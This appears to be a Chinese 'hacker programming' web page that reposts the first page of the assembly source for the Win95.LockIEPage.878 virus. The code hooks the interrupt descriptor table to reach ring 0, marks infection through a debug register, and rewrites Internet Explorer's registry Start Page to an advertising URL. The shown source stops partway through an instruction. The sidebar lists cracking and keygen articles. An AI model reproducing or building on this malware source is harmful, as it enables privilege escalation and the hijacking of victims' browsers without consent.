Win9x病毒--Win95.LockIEPage.878原代码


网站首页 \| 网页制作 \| 网络编程 \| 图形图象 \| 冲浪宝典 \| 操作系统 \| 软件教学 \| 网络安全 \| 认证考试 \| 下载中心 \| 游戏下载

\| 网络安全首页 \| 安全在线 \| 病毒防治 \| 黑客攻防 \| 漏洞研究 \| 黑客编程 \| 破解手记 \|

您现在的位置：超人气学院 >> 网络安全 >> 黑客编程 >> 文章正文

用户登录

新用户注册

Win9x病毒--Win95.LockIEPage.878原代码

Win9x病毒--Win95.LockIEPage.878原代码

作者：未知文章来源：网络收集点击数：更新时间：2006-3-29 15:22:23

Author: whg
Email: whg@whitecell.org
Homepage

screen.width-600)this.style.width=screen.width-600;">_blank>http://www.whitecell.org

include win32v.inc
extrn ExitProcess: proc
.586p
.model flat,stdcall
.data
@@Start:
pushad
push eax
sidt [esp-2] ;保存Idt基地址
pop esi ;弹出Idt基地址
add esi,3*8 ;得到中断03的线形地址指针
mov ecx,[esi]
mov edx,[esi+4] ;保存中断03的线形地址
call @@SetMyInt03
@@MyInt03: ;我的中断03 Ring0程序
pushad
mov [esi],ecx
mov [esi+4],edx ;恢复中断03的线形地址
mov eax,dr3 ;我用dr3做病毒标志
mov ecx,VirusFlag
@@IsInstalled:
cmp eax,ecx
jz @@ExitHook
mov dr3,ecx ;设置病毒标志
call @@SetVxdCall ;填写VXDCALL指令（Int 20h）
@@SetVxdCallOk:
push eax
push esp
call @@PushPathNameAddr
PathName db "SoftWare\MicroSoft\Internet Explorer\Main",0
@@PushPathNameAddr:
push 80000001h
@@RegOpenKey:
int 20h ;打开注册表一个Key
dd 00010148h ;VMMCall_RegOpenKey
add esp,3*4
pop ebp
or eax,eax
jnz short @@OpenRegKeyError
push 040h
call @@PushHttpNameAddr
HttpName db

screen.width-600)this.style.width=screen.width-600;">_blank>http://202.115.16.8/~ekang",0 ;这是广告网页
@@PushHttpNameAddr:
push 01h
push 00h
call @@PushValueNameAddr
ValueName db "Start Page",0
@@PushValueNameAddr:
push ebp
@@RegSetValueEx:
int 20h ;设置IE Start Page页面为我的广告网址
dd 000101

[1] [2] [3] [4] [5] 下一页

[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入：kinda 责任编辑：kinda

上一篇文章： Tini 的VC原代码

下一篇文章： C语言库函数(A类字母)

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

专题栏目

最新热门

Windows中巧用RUNDLL3[5355]
黑客软件编写基础知识[827]
Win32Asm快速教程[535]

WinImage密码的另一种破解
极速登录3.6---用winHEX破
桥牌软件DeepFinesse的注册
MagicWin981.30f的注册机源
破解adbin1.2
winzip注册机源码
WinZIP.Self.Extractor.v2
用插件(plugin)的方式改变
一个Winzip8.0的注册机供大
Winrar2.8到3.0升级手记
windowsXP下的向量化异常处
菜鸟破解录(10)之ADayinth
win2000下手动破解Elib2.0
WinKawaks1.45脱壳笔记
Windows程序

网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明
	联系QQ:80849